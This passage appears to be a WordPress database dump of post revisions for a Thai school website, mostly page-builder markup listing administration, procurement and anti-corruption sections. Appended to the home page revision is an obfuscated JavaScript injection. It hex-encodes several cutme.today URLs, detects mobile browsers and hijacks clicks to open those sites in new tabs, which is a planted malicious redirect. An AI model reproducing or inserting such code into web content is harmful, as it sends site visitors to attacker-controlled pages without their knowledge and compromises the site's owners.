style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 11:16:42','2024-07-27 04:16:42','',14,'http://pakhaeng.ssk.in.th/?p=87',0,'revision','',0),
(89,1,'2024-07-27 11:17:09','2024-07-27 04:17:09','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\